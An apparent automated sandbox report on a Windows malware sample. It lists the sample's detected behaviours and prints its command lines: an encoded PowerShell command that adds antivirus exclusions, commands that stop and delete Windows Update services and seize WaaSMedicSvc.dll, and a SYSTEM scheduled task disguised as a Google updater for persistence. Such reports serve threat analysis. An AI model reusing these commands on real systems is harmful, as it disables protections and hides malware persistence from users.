a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
7MB
16-05-2022 00:56
behavioral1
95104aa61ed30687c13e5c644d5722f3
f9788f808044d448f73203d93da0021cefb781ff
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Filter: none
-
Modifies security servicereg.exe
Tags
TTPs
Reported IOCs
description ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Possible privilege escalation attempttakeown.exeicacls.exe
Tags
Reported IOCs
pid process 1500 takeown.exe 1688 icacls.exe -
Stops running service(s)
Tags
TTPs
-
Modifies file permissionstakeown.exeicacls.exe
Tags
TTPs
Reported IOCs
pid process 1500 takeown.exe 1688 icacls.exe -
Drops file in System32 directorypowershell.exe
Reported IOCs
description ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directoryconhost.exe
Reported IOCs
description ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Description
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s)schtasks.exe
Description
Schtasks is often used by malware for persistence or to perform post-infection execution.
Tags
TTPs
Reported IOCs
pid process 280 schtasks.exe -
Modifies registry keyreg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe
TTPs
Reported IOCs
pid process 1748 reg.exe 1628 reg.exe 1516 reg.exe 1632 reg.exe 316 reg.exe 1548 reg.exe 576 reg.exe 776 reg.exe 1600 reg.exe -
Suspicious behavior: EnumeratesProcessespowershell.execonhost.exe
Reported IOCs
pid process 1692 powershell.exe 1384 conhost.exe -
Suspicious use of AdjustPrivilegeTokenpowershell.execonhost.exetakeown.exe
Reported IOCs
description pid process Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1384 conhost.exe Token: SeTakeOwnershipPrivilege 1500 takeown.exe -
Suspicious use of WriteProcessMemorya4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.execmd.execmd.execmd.exe
Reported IOCs
description pid process target process PID 1008 wrote to memory of 1384 1008 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 1008 wrote to memory of 1384 1008 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 1008 wrote to memory of 1384 1008 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 1008 wrote to memory of 1384 1008 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 1384 wrote to memory of 2024 1384 conhost.exe cmd.exe PID 1384 wrote to memory of 2024 1384 conhost.exe cmd.exe PID 1384 wrote to memory of 2024 1384 conhost.exe cmd.exe PID 2024 wrote to memory of 1692 2024 cmd.exe powershell.exe PID 2024 wrote to memory of 1692 2024 cmd.exe powershell.exe PID 2024 wrote to memory of 1692 2024 cmd.exe powershell.exe PID 1384 wrote to memory of 588 1384 conhost.exe cmd.exe PID 1384 wrote to memory of 588 1384 conhost.exe cmd.exe PID 1384 wrote to memory of 588 1384 conhost.exe cmd.exe PID 588 wrote to memory of 580 588 cmd.exe sc.exe PID 588 wrote to memory of 580 588 cmd.exe sc.exe PID 588 wrote to memory of 580 588 cmd.exe sc.exe PID 588 wrote to memory of 1920 588 cmd.exe sc.exe PID 588 wrote to memory of 1920 588 cmd.exe sc.exe PID 588 wrote to memory of 1920 588 cmd.exe sc.exe PID 588 wrote to memory of 1176 588 cmd.exe sc.exe PID 588 wrote to memory of 1176 588 cmd.exe sc.exe PID 588 wrote to memory of 1176 588 cmd.exe sc.exe PID 588 wrote to memory of 700 588 cmd.exe sc.exe PID 588 wrote to memory of 700 588 cmd.exe sc.exe PID 588 wrote to memory of 700 588 cmd.exe sc.exe PID 588 wrote to memory of 1380 588 cmd.exe sc.exe PID 588 wrote to memory of 1380 588 cmd.exe sc.exe PID 588 wrote to memory of 1380 588 cmd.exe sc.exe PID 588 wrote to memory of 776 588 cmd.exe reg.exe PID 588 wrote to memory of 776 588 cmd.exe reg.exe PID 588 wrote to memory of 776 588 cmd.exe reg.exe PID 588 wrote to memory of 1600 588 cmd.exe reg.exe PID 588 wrote to memory of 1600 588 cmd.exe reg.exe PID 588 wrote to memory of 1600 588 cmd.exe reg.exe PID 588 wrote to memory of 1748 588 cmd.exe reg.exe PID 588 wrote to memory of 1748 588 cmd.exe reg.exe PID 588 wrote to memory of 1748 588 cmd.exe reg.exe PID 588 wrote to memory of 1628 588 cmd.exe reg.exe PID 588 wrote to memory of 1628 588 cmd.exe reg.exe PID 588 wrote to memory of 1628 588 cmd.exe reg.exe PID 588 wrote to memory of 1516 588 cmd.exe reg.exe PID 588 wrote to memory of 1516 588 cmd.exe reg.exe PID 588 wrote to memory of 1516 588 cmd.exe reg.exe PID 588 wrote to memory of 1500 588 cmd.exe takeown.exe PID 588 wrote to memory of 1500 588 cmd.exe takeown.exe PID 588 wrote to memory of 1500 588 cmd.exe takeown.exe PID 588 wrote to memory of 1688 588 cmd.exe icacls.exe PID 588 wrote to memory of 1688 588 cmd.exe icacls.exe PID 588 wrote to memory of 1688 588 cmd.exe icacls.exe PID 1384 wrote to memory of 1140 1384 conhost.exe cmd.exe PID 1384 wrote to memory of 1140 1384 conhost.exe cmd.exe PID 1384 wrote to memory of 1140 1384 conhost.exe cmd.exe PID 1140 wrote to memory of 280 1140 cmd.exe schtasks.exe PID 1140 wrote to memory of 280 1140 cmd.exe schtasks.exe PID 1140 wrote to memory of 280 1140 cmd.exe schtasks.exe PID 588 wrote to memory of 1632 588 cmd.exe reg.exe PID 588 wrote to memory of 1632 588 cmd.exe reg.exe PID 588 wrote to memory of 1632 588 cmd.exe reg.exe PID 588 wrote to memory of 316 588 cmd.exe reg.exe PID 588 wrote to memory of 316 588 cmd.exe reg.exe PID 588 wrote to memory of 316 588 cmd.exe reg.exe PID 588 wrote to memory of 1548 588 cmd.exe reg.exe PID 588 wrote to memory of 1548 588 cmd.exe reg.exe PID 588 wrote to memory of 1548 588 cmd.exe reg.exe
-
C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"Drops file in Program Files directorySuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"Drops file in System32 directorySuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLESuspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc
-
C:\Windows\system32\sc.exesc stop UsoSvc
-
C:\Windows\system32\sc.exesc stop bits
-
C:\Windows\system32\sc.exesc stop dosvc
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /fModifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /fModifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /fModifies security serviceModifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /fModifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dllPossible privilege escalation attemptModifies file permissionsSuspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /fModifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /qPossible privilege escalation attemptModifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /fModifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /fModifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /fModifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /fModifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"
-
C:\Windows\system32\taskeng.exetaskeng.exe {8F1A1782-3646-432C-9F35-2195D7882870} S-1-5-18:NT AUTHORITY\System:Service:
-
memory/280-79-0x0000000000000000-mapping.dmp
-
memory/316-81-0x0000000000000000-mapping.dmp
-
memory/576-83-0x0000000000000000-mapping.dmp
-
memory/580-66-0x0000000000000000-mapping.dmp
-
memory/588-65-0x0000000000000000-mapping.dmp
-
memory/676-91-0x0000000000000000-mapping.dmp
-
memory/700-69-0x0000000000000000-mapping.dmp
-
memory/776-71-0x0000000000000000-mapping.dmp
-
memory/808-87-0x0000000000000000-mapping.dmp
-
memory/864-92-0x0000000000000000-mapping.dmp
-
memory/1008-88-0x0000000000000000-mapping.dmp
-
memory/1008-54-0x0000000000400000-0x0000000001119000-memory.dmp
-
memory/1016-86-0x0000000000000000-mapping.dmp
-
memory/1140-78-0x0000000000000000-mapping.dmp
-
memory/1176-68-0x0000000000000000-mapping.dmp
-
memory/1380-70-0x0000000000000000-mapping.dmp
-
memory/1384-58-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp
-
memory/1384-56-0x0000000000160000-0x000000000057C000-memory.dmp
-
memory/1384-57-0x000000001BB40000-0x000000001BF5C000-memory.dmp
-
memory/1500-76-0x0000000000000000-mapping.dmp
-
memory/1516-75-0x0000000000000000-mapping.dmp
-
memory/1548-82-0x0000000000000000-mapping.dmp
-
memory/1600-72-0x0000000000000000-mapping.dmp
-
memory/1628-74-0x0000000000000000-mapping.dmp
-
memory/1632-80-0x0000000000000000-mapping.dmp
-
memory/1688-77-0x0000000000000000-mapping.dmp
-
memory/1692-60-0x0000000000000000-mapping.dmp
-
memory/1692-62-0x000007FEEDB20000-0x000007FEEE67D000-memory.dmp
-
memory/1692-64-0x000000000286B000-0x000000000288A000-memory.dmp
-
memory/1692-63-0x0000000002864000-0x0000000002867000-memory.dmp
-
memory/1696-85-0x0000000000000000-mapping.dmp
-
memory/1748-73-0x0000000000000000-mapping.dmp
-
memory/1856-84-0x0000000000000000-mapping.dmp
-
memory/1920-67-0x0000000000000000-mapping.dmp
-
memory/1968-90-0x0000000000000000-mapping.dmp
-
memory/2024-59-0x0000000000000000-mapping.dmp
-
memory/2028-89-0x0000000000000000-mapping.dmp